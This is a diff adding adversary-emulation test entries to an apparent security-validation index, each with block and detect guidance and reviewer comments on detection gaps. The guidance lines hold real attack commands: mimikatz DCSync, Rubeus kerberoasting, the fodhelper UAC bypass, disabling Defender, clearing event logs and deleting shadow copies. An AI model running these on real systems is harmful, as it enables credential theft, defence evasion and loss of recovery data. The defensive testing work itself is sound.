+description: Set the UseLogonCredential key in the WDigest hive to enable cleartext credential storage in-memory
+platforms:
+- windows
+guidance:
+- cmd> reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
+block:
+- Suspicious Registry modification blocked by endpoint security tool
+detect:
+- Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656).
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: 9a66066b-997b-4ff1-8b4b-c14d982df861
+ tid: T1112
+ tactic: TA0005
+ x_vectr_id: 9a66066b-997b-4ff1-8b4b-c14d982df861
+ isv: 1
diff --git a/ot-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml b/ot-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml
new file mode 100644
index 0000000..ff73fb9
--- /dev/null
+++ b/ot-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml
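Review bot: The detect line keys on Event ID 4656 (a handle to an object was requested), which fires on every audited open of the key and does not record the value written; the event that captures the modification itself, with old and new data, is 4657 "A registry value was modified" (requires Audit Registry and a SACL that includes Set Value), and Sysmon Event ID 13 on `...\WDigest\UseLogonCredential` is the simpler equivalent. Suggest `... using object access logs (Event ID 4657 for the value change; 4656/4663 for handle and access attempts) or Sysmon Event ID 13`. Also, on Windows 8.1/Server 2012 R2 and later the value is absent and WDigest caching is off by default, so setting it to 1 only affects logons that occur after the change — as written the test proves the registry write, not cleartext retrieval, unless a fresh interactive logon and an LSASS read follow, and the entry should say so and tell the operator to revert the value afterwards (`reg delete ... /v UseLogonCredential /f`).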
@@ -0,0 +1,20 @@
+name: Volumetric Kerberoasting
+description: Retrieve Kerberos TGS tickets from Active Directory for all users with service principal names (SPNs) set
+platforms:
+guidance:
+- cmd> Rubeus.exe kerberoast
+block:
+- ''
+detect:
+- 'Configure Advanced Audit for Kerberos operations on domain controllers via Group Policy. Using ticket request logs (Event ID 4769), detect suspicious ticket request operations using one or more of the following strategies: 1) Look for a high volume of ticket requests or unique service principals in a short period of time as compared to the typical number of requests by that source. 2) Configure a honey account with a service principal name set then alert when any ticket is requested for that SPN (this requires first configuring a SACL on the account as well as directory service object access auditing via Advanced Audit). 3) Look for downgraded encryption requests where the requested ticket uses RC4 while the target object uses AES (Note: in cases where the account has a weak password, AES tickets can be cracked in a realistic timeframe so attacks may request AES tickets).'
+controls:
+- SIEM
+- Identity Threat Protection
+metadata:
+ id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7
+ tid: T1558.003
+ tactic: TA0006
+ x_tools:
+ - https://github.com/GhostPack/Rubeus
+ x_vectr_id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7
+ isv: 1
diff --git a/ot-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml b/ot-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml
new file mode 100644
index 0000000..76795bc
--- /dev/null
+++ b/ot-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml
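Review bot: `block` is `''`, yet there are hardening controls that make this technique yield nothing even when every TGS request succeeds: restricting SPN-bearing accounts to AES via `msDS-SupportedEncryptionTypes` (which is also what gives strategy 3's RC4-downgrade check its meaning), using gMSA or long random passwords for service accounts, and keeping privileged accounts free of SPNs. Suggest `- Service accounts use gMSA or long random passwords and are restricted to AES encryption types so roasted tickets are not crackable (Hardening)` and adding `Hardening` to `controls`, as the LSASS entries in this commit do. Minor: "attacks may request AES tickets" should read "attackers".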
@@ -0,0 +1,20 @@
+name: Extract domain user credentials via replication
+description: Replicate a user's hash from a domain controller using replication APIs (DCSync).
+platforms:
+- windows
+guidance:
+- (from workstation) mimikatz> lsadump::dcsync /domain:{{ domain }} /user:{{ user }}
+block:
+- ''
+detect:
+- Enable object logging for directory services via Group Policy Advanced Audit then alert when non-domin controller sources replicate directory objects. Specifically, look for Event ID 4662 events where the action performed was related to replicating object changes (e.g. either/both of "Replicating Directory Changes all" and "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"/"{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}")
+- https://blog.blacklanternsecurity.com/p/detecting-dcsync
+controls:
+- SIEM
+- Identity Threat Protection
+metadata:
+ id: d6dd145b-c7ae-4f79-bc07-179a012a7a07
+ tid: T1003.006
+ tactic: TA0006
+ x_vectr_id: d6dd145b-c7ae-4f79-bc07-179a012a7a07
+ isv: 1
diff --git a/ot-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml b/ot-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml
new file mode 100644
index 0000000..8950dd0
--- /dev/null
+++ b/ot-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml
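Review bot: The 4662 guidance lists the same GUID twice: `{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}` is DS-Replication-Get-Changes-All, and the second control access right DCSync exercises is DS-Replication-Get-Changes, `{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}` (with `{89e95b76-444d-4c62-991a-0facbeda640c}` Get-Changes-In-Filtered-Set for RODC-filtered attributes), so a rule copied from this text would match only one of the rights. Suggest `(e.g. "Replicating Directory Changes All" {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} and "Replicating Directory Changes" {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2})`. `non-domin` should be `non-domain`, and the rule needs an allow-list for DC computer accounts and legitimate sync principals (e.g. Azure AD Connect) or it will page on every replication cycle. `block` is `''`, but restricting these two rights on the domain head to DCs and known sync accounts is a concrete hardening item the index could name.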
@@ -0,0 +1,22 @@
+name: Clear Windows Event Log entries
+description: Clear the Windows Event Log entries using the builtin wevtutil.exe to remove any attack indicators in the logs.
+platforms:
+- windows
+guidance:
+- CMD> wevtutil clear-log Security
+- CMD> wevtutil clear-log Application
+- CMD> wevtutil clear-log System
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Suspicious Windows Event Log deletion is detected in the SIEM using Event Log events (Event ID 1102)
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1
+ tid: T1070.001
+ tactic: TA0005
+ x_vectr_id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1
+ isv: 1
diff --git a/ot-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml b/ot-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml
new file mode 100644
index 0000000..1194713
--- /dev/null
+++ b/ot-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml
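Review bot: Event ID 1102 is written only when the Security log is cleared; the second and third guidance lines clear Application and System, and those clears are recorded as Event ID 104 in the System log, so the SIEM detection as written covers one of the three actions the test performs. Suggest `- Suspicious Windows Event Log deletion is detected in the SIEM using Event Log events (Event ID 1102 for the Security log, Event ID 104 for other logs)`. Since the clear also destroys the local copy of everything before it, this detection only holds when events are forwarded to the SIEM in near real time — worth stating as a precondition so a late-forwarding collector is not scored as a detection gap in the wrong place.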
@@ -0,0 +1,20 @@
+name: Sideload a DLL into a legitimate application
+description: Rename an attacker-controlled DLL to the name of a DLL expected by a legitimate application, move that DLL to be adjacent to the application, then execute the application in order to trigger the loading of the DLL by the legitimate application.
+platforms:
+- windows
+guidance:
+- "CMD>\ncopy {{ application }} .\nmove {{ dll }} {{ expected_dll }}\n{{ application }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Using image load telemetry, alert on DLLs stored on-disk at unexpected locations (e.g. a DLL expected to be in System32 being loaded from a temp folder)
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: 2496e250-5757-482f-9661-daea872395ae
+ tid: T1574.002
+ tactic: TA0005
+ x_vectr_id: 2496e250-5757-482f-9661-daea872395ae
+ isv: 1
diff --git a/ot-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml b/ot-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml
new file mode 100644
index 0000000..bc14660
--- /dev/null
+++ b/ot-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml
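Review bot: The detect line targets DLLs loaded from unexpected locations, but the guidance first copies the application into the working directory (`copy {{ application }} .`), so the DLL is loaded from the same directory as a legitimately signed executable — "unexpected location" alone will not discriminate this case from a portable app. The stronger image-load signal (Sysmon Event ID 7) is a signed application loading an unsigned DLL, or a DLL whose name matches a known system DLL but whose signer or hash does not, from a user-writable path. Suggest `- Using image load telemetry (e.g. Sysmon Event ID 7), alert when a signed application loads an unsigned DLL, or a DLL whose name matches a known DLL but whose signer/hash does not, from a user-writable directory`.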
@@ -0,0 +1,22 @@
+name: Load known-abusable kernel driver
+description: Load a legitimate and signed kernel driver that is vulnerable to exploitation. Refer to projects like KDU (https://github.com/hfiref0x/KDU/) for potential vulnerable drivers to use. Vulnerable, signed drivers provide a privileged (kernel) execution mechanism to attackers, allowing them to bypass security controls they couldn't otherwise bypass, such as by killing protected processes.
+platforms:
+- windows
+guidance:
+- "(example) cmd> \nsc.exe create {{ name }} type= kernel start= demand error= normal binpath= c:\\windows\\System32\\Drivers\\{{ sys_file }} displayname= {{ name }}\nsc.exe start {{ name }}\n"
+block:
+- Use built-in Windows security features like HVCI and WDAC to block loading of drivers based on hash and/or signature characteristics.
+- https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules
+- https://www.loldrivers.io/
+- Anomalous driver load blocked by endpoint security tool
+detect:
+- Anomalous driver load detected by endpoint security tool or in the SIEM via telemetry data, such as Sysmon ID 6
+controls:
+- Hardening
+- Endpoint Protection
+metadata:
+ id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0
+ tid: T1014
+ tactic: TA0005
+ x_vectr_id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0
+ isv: 1
diff --git a/ot-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml b/ot-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml
new file mode 100644
index 0000000..77a3868
--- /dev/null
+++ b/ot-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml
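Review bot: The `sc.exe create` guidance points `binpath=` at `c:\windows\System32\Drivers\{{ sys_file }}` but no step places the driver there, so the test as written fails unless the operator already knows to copy the .sys in first — add `copy {{ sys_file }} c:\windows\system32\drivers\` before the `sc.exe create` line. On detection, Sysmon Event ID 6 carries the hash and signer of the loaded driver, which is exactly what loldrivers.io keys on, so `- Compare Sysmon Event ID 6 driver hashes/signers against the loldrivers.io list; alert on Event ID 7045 (System) / 4697 (Security) for a newly installed kernel service` would make the detect line actionable and justify adding `SIEM` to `controls`. Note also that Microsoft's vulnerable driver blocklist is enforced by default only where HVCI (or Smart App Control) is on; elsewhere it has to be applied through the WDAC policy already linked under `block`. `tid: T1014` (Rootkit) is a stretch for bring-your-own-vulnerable-driver — ATT&CK generally files it under T1068 or T1562.001 — confirm against the index's intent.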
@@ -0,0 +1,25 @@
+name: Bypass User Account Control (UAC) via fodhelper
+description: Bypass user account control (UAC) to move to a high-integrity execution context via fodhelper.exe and a Registry modification
+platforms:
+- windows
+guidance:
+- cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /f
+- cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "C:\windows\system32\cmd.exe" /f
+- cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /d "" /f
+- cmd> c:\windows\system32\fodhelper.exe
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Suspicious Windows Registry access/modifications detected in the SIEM using telemetry (e.g. Windows Advanced Audit events, endpoint security tool logs)
+controls:
+- SIEM
+- Endpoint Protection
+metadata:
+ id: 8c06191e-8c03-4b97-8c18-e28cde39fda5
+ tid: T1548.002
+ tactic: TA0004
+ x_references:
+ - https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/
+ x_vectr_id: 8c06191e-8c03-4b97-8c18-e28cde39fda5
+ isv: 1
diff --git a/ot-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml b/ot-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml
new file mode 100644
index 0000000..9574d4f
--- /dev/null
+++ b/ot-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml
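Review bot: The guidance leaves `HKCU\Software\Classes\ms-settings\Shell\Open\command` populated after the test, which keeps a working UAC bypass primed on that host for the next fodhelper launch by anyone in that user's session; add a final `cmd> reg delete HKCU\Software\Classes\ms-settings /f` so the exercise cleans up after itself. The registry detect line can be made precise, because this key has no legitimate writer: `- Creation of or writes to HKCU\Software\Classes\ms-settings\Shell\Open\command (Sysmon Event ID 12/13, or Event ID 4657 with a SACL), followed by fodhelper.exe spawning a child process`. The technique only works for a user in the local Administrators group running at medium integrity with UAC below "Always notify" — worth stating as a precondition so a non-admin test account is not scored as a block.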
@@ -0,0 +1,20 @@
+name: DLL execution using Rundll32
+description: Execute a malicious DLL's function directly using rundll32
+platforms:
+- windows
+guidance:
+- cmd> rundll32 {{ dll }},{{ export }} [{{ args }}]
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Payload on disk deleted/quarantined by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: 940be4b6-6081-4808-ab64-aceadfeb3792
+ tid: T1218.011
+ tactic: TA0005
+ x_vectr_id: 940be4b6-6081-4808-ab64-aceadfeb3792
+ isv: 1
diff --git a/ot-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml b/ot-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml
new file mode 100644
index 0000000..66ceb94
--- /dev/null
+++ b/ot-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml
@@ -0,0 +1,20 @@
+name: Disable Windows Defender via PowerShell
+description: Use PowerShell's Set-MpPreference to disable Windows Defender
+platforms:
+- windows
+guidance:
+- PS> Set-MpPreference -DisableBehaviorMonitoring $true
+- PS> Set-MpPreference -DisableRealtimeMonitoring $true
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- "Changes to Defender's running state are detected using Defender Event Log events (e.g. 5001 for being disabled, 5004 and 5007 for being changed; full list: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus)"
+controls:
+- Endpoint Protection
+metadata:
+ id: cb3ea139-979c-438a-9cf7-611b985f4d61
+ tid: T1562.001
+ tactic: TA0005
+ x_vectr_id: cb3ea139-979c-438a-9cf7-611b985f4d61
+ isv: 1
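Review bot: In the Rundll32 entry, `SIEM` is listed under `controls` but `detect` holds only the generic EDR line, and rundll32 invoking an export is routine system behavior, so the discriminating signal is the DLL itself rather than the process. Suggest `- rundll32.exe loading an unsigned DLL, or a DLL from a user-writable or non-standard path (outside System32/SysWOW64/Program Files), detected via image load telemetry (e.g. Sysmon Event ID 7) or the 4688 command line`. The `[{{ args }}]` bracket notation should be noted as "optional" somewhere, since an operator may otherwise type the brackets literally.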
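Review bot: In the Defender entry, neither `Set-MpPreference` line takes effect when Defender Tamper Protection is enabled — the change is rejected and logged — and that, not a behavioral block by the EDR, is the control that actually defeats this technique, yet it is absent from `block` and `controls`. Suggest `- Tamper Protection enabled (locally or via Intune/Defender for Endpoint) rejects the preference change` with `Hardening` added to `controls`, matching the other entries in this commit. The event list is right (5001 real-time protection disabled; 5004/5007 configuration changes); it is worth adding that the cmdlets require local admin, so the test presumes an elevated PowerShell session, and that the state must be restored afterwards with `Set-MpPreference -DisableRealtimeMonitoring $false -DisableBehaviorMonitoring $false`.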
diff --git a/ot-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml b/ot-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml
new file mode 100644
index 0000000..df9cb79
--- /dev/null
+++ b/ot-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml
@@ -0,0 +1,16 @@
+name: Modify identity policy in IdP
+description: Modify an IdP policy to be more permissive for authentication. For example, disable an Azure AD conditional access policy's MFA requirement.
+platforms:
+guidance:
+block:
+- ''
+detect:
+- Monitor for policy modifications from IdP control plane telemetry and look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes
+controls:
+- SIEM
+metadata:
+ id: cbd9070f-03fa-455f-af46-99e8d41146ac
+ tid: T1484
+ tactic: TA0003
+ x_vectr_id: cbd9070f-03fa-455f-af46-99e8d41146ac
+ isv: 1
diff --git a/ot-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml b/ot-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml
new file mode 100644
index 0000000..b1e1235
--- /dev/null
+++ b/ot-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml
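Review bot: `tid: T1484` is Domain Policy Modification (GPO and trust changes) with tactics Defense Evasion and Privilege Escalation, so pairing it with `tactic: TA0003` (Persistence) will not line up in a Navigator layer; the example the description gives — relaxing an Azure AD conditional access policy's MFA requirement — has its own sub-technique since ATT&CK v14 (October 2023), T1556.009 Modify Authentication Process: Conditional Access Policies, whose tactics do include Persistence. Suggest `tid: T1556.009`. The detect line could also name the concrete signal: in the Entra ID audit log the activity is `Update conditional access policy` (category Policy), so a rule can key on that rather than on generic "policy modifications". `block` is `''`; restricting the Conditional Access Administrator / Security Administrator roles behind PIM with approval is the hardening an assessor would expect to see listed.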
@@ -0,0 +1,22 @@
+name: BloodHound DC enumeration
+description: Use BloodHound/SharpHound to perform enumeration of domain resources against a domain controller
+platforms:
+guidance:
+- cmd> SharpHound.exe -c DcOnly
+block:
+- ''
+detect:
+- Windows enumeration activities detected from large amount of network traffic (SMB, ARP, SAMR, etc) via UEBA-like or network monitoring tools
+- Enable object logging for directory services via Group Policy Advanced Audit then configure a SACL on Active Directory objects. Trigger an alert when multiple (high-value) objects are accessed by a single source in a short period using object access logs for the directory service objects (Evevnt ID 4656, 4663)
+- https://blog.blacklanternsecurity.com/p/detecting-ldap-recoannaissance
+controls:
+- SIEM
+- Identity Threat Protection
+metadata:
+ id: 672f8861-c914-4f58-b861-5107ce19f61c
+ tid: T1087.002
+ tactic: TA0007
+ x_tools:
+ - https://github.com/BloodHoundAD/SharpHound
+ x_vectr_id: 672f8861-c914-4f58-b861-5107ce19f61c
+ isv: 1
diff --git a/ot-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml b/ot-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml
new file mode 100644
index 0000000..0502f98
--- /dev/null
+++ b/ot-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml
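Review bot: `-c DcOnly` restricts SharpHound to LDAP collection against the domain controller (no SMB session or local-group enumeration against member hosts), so the first detect line — enumeration seen as a large amount of SMB/ARP/SAMR traffic — does not apply to this variant and gives a false sense of coverage. The LDAP-side telemetry is the DC's Directory Service log Event ID 1644 (expensive/inefficient searches, enabled via the "15 Field Engineering" diagnostic level and the search-time thresholds) or an identity threat tool's per-client LDAP query volume; suggest adding `- Enable LDAP search logging on domain controllers (Directory Service Event ID 1644) and alert on a single client issuing a high volume of broad, domain-root searches in a short window`. `Evevnt` is misspelled, and the reference URL contains `recoannaissance` — check that the link resolves before publishing. Directory-object SACL auditing (the second line) is also expensive on a busy DC; the entry should say to scope it to a small set of sensitive objects.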
@@ -0,0 +1,23 @@
+name: Enumerate domain groups and users using net
+description: Enumerate domain users and domain groups using the builtin net.exe
+platforms:
+- windows
+guidance:
+- cmd> net user /domain
+- cmd> net group /domain
+- cmd> net group "Domain Admins" /domain
+- cmd> net group "Domain Computers" /domain
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2
+ tid: T1087.002
+ tactic: TA0007
+ x_vectr_id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2
+ isv: 1
diff --git a/ot-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml b/ot-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml
new file mode 100644
index 0000000..e73f4ce
--- /dev/null
+++ b/ot-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml
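Review bot: The detect guidance to baseline on the process/image name needs a caveat for this test case: `net.exe` hands the `user` and `group` subcommands off to a child `net1.exe`, so a 4688-based analytic keyed only on `net.exe` sees the parent but misses the process that actually performs the enumeration, and allow-lists built on the same baseline will disagree between the two. Suggest appending `Note that net.exe spawns net1.exe for these subcommands; include both image names in the baseline and in any detection logic.` to the second detect item. The `/domain` switch also causes the query to go to a domain controller, so the DC-side LDAP/SAMR detections listed in the BloodHound entry apply here too and could be cross-referenced.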
@@ -0,0 +1,20 @@
+name: Domain Controller discovery via nltest
+description: Use nltest.exe to identify domain controllers in the domain
+platforms:
+- windows
+guidance:
+- cmd> nltest.exe /dclist:{{ domain }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: bc85f11b-e481-4afb-a5f5-db26e5c07433
+ tid: T1018
+ tactic: TA0007
+ x_vectr_id: bc85f11b-e481-4afb-a5f5-db26e5c07433
+ isv: 1
diff --git a/ot-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml b/ot-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml
new file mode 100644
index 0000000..867c552
--- /dev/null
+++ b/ot-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml
@@ -0,0 +1,22 @@
+name: Macro - Remote Template
+description: Execute a malicious Office document on the endpoint that will load a macro stored in a remote template document
+platforms:
+- windows
+guidance:
+block:
+- Macro execution is blocked by GPO policy
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Payload on disk deleted/quarantined by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Payload on disk triggers an alert with endpoint security tool
+controls:
+- Endpoint Protection
+- Hardening
+- SIEM
+metadata:
+ id: a7134d71-dc49-41a8-a309-ec520c96a089
+ tid: T1221
+ tactic: TA0005
+ x_vectr_id: a7134d71-dc49-41a8-a309-ec520c96a089
+ isv: 1
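Review bot: The `guidance` list for the remote-template entry is empty even though the REQUIREMENTS payload table in this commit defines a specific artefact (an Office document that loads a remotely hosted macro-enabled template); a single line such as `- Open the document on the target endpoint; the template URL must be reachable from the endpoint at test time` would make the run reproducible. The first block item (`Macro execution is blocked by GPO policy`) is only half the picture for template injection, because the opened document carries no macro itself: the "Block macros from running in Office files from the Internet" policy has to apply to the fetched template, and a useful detect item is an Office process (winword.exe/excel.exe) making an outbound HTTP(S) request for a template before any macro runs. Separately, the file lives under `techniques/Execution/` but carries `tactic: TA0005`; ATT&CK maps T1221 to Defense Evasion, so the tactic is right and the directory is the inconsistent part if directories are meant to mirror tactics.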
diff --git a/ot-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml b/ot-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml
new file mode 100644
index 0000000..77e983d
--- /dev/null
+++ b/ot-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml
@@ -0,0 +1,19 @@
+name: Extract sensitive data over HTTP
+description: Extract data from the network over HTTP tcp/80 to an external host or IP.
+platforms:
+guidance:
+- http://dlptest.com/http-post/
+block:
+- Sensitive data sent over the network is blocked by network DLP tool
+detect:
+- Sensitive data sent over the network is detected by network DLP tool
+controls:
+- Firewall
+- DLP
+- Web Gateway
+metadata:
+ id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860
+ tid: T1048.003
+ tactic: TA0010
+ x_vectr_id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860
+ isv: 1
diff --git a/ot-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml b/ot-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml
new file mode 100644
index 0000000..b807191
--- /dev/null
+++ b/ot-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml
@@ -0,0 +1,19 @@
+name: Extract data to cloud storage service
+description: Extract data from the internal network to a cloud storage service like MEGA, Google Drive, or Box
+platforms:
+guidance:
+block:
+- Sensitive data sent over the network is blocked by network DLP tool
+- Network security tool detects connection to domain based on category from proxy or DNS
+detect:
+- Sensitive data sent over the network is detected by network DLP tool
+controls:
+- Firewall
+- DLP
+- Web Gateway
+metadata:
+ id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66
+ tid: T1567.002
+ tactic: TA0010
+ x_vectr_id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66
+ isv: 1
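Review bot: In the cloud-storage entry the second `block` item is worded as a detection (`Network security tool detects connection to domain based on category from proxy or DNS`) while no category-based item appears under `detect`, so the two lists disagree about what the proxy/DNS control is expected to do. Suggest changing the block item to `- Connection to the cloud storage domain is blocked by proxy or DNS filtering based on URL/domain category` and adding `- Connection to an unsanctioned cloud storage domain is alerted on from proxy/DNS category logs` under `detect`. The `guidance` list is empty; naming the upload method expected (browser upload versus the service's CLI/API client) matters because DLP inspection of the former depends on TLS interception at the web gateway, which would be worth stating as a prerequisite.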
diff --git a/ot-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml b/ot-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml
new file mode 100644
index 0000000..3c2f885
--- /dev/null
+++ b/ot-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml
@@ -0,0 +1,20 @@
+name: Extract sensitive data over HTTP C2
+description: Extract data from the network via an HTTP C2 channel over tcp/80 to external host or IP
+platforms:
+guidance:
+- implant> download {{ file }}
+block:
+- Sensitive data sent over the network is blocked by network DLP tool
+- C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+detect:
+- C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+controls:
+- Firewall
+- DLP
+- Web Gateway
+metadata:
+ id: b48fa856-d004-4d5a-918f-d9429a9cd8e3
+ tid: T1041
+ tactic: TA0010
+ x_vectr_id: b48fa856-d004-4d5a-918f-d9429a9cd8e3
+ isv: 1
diff --git a/ot-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml b/ot-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml
new file mode 100644
index 0000000..2dbf5f4
--- /dev/null
+++ b/ot-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml
@@ -0,0 +1,20 @@
+name: Delete shadows with vssadmin.exe
+description: Delete volume shadow copies on the host to inhibit file system recovery
+platforms:
+- windows
+guidance:
+- CMD> vssadmin.exe delete shadows /all /quiet
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Suspicious Volume Shadow Service use detected in the SIEM using telemetry
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4
+ tid: T1490
+ tactic: TA0040
+ x_vectr_id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4
+ isv: 1
diff --git a/ot-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml b/ot-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml
new file mode 100644
index 0000000..4e63384
--- /dev/null
+++ b/ot-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml
@@ -0,0 +1,16 @@
+name: Modify group policy object
+description: Modify a domain group policy object. This can be used for activities like persisting access to the environment, disabling security controls, and executing ransomware on domain systems.
+platforms:
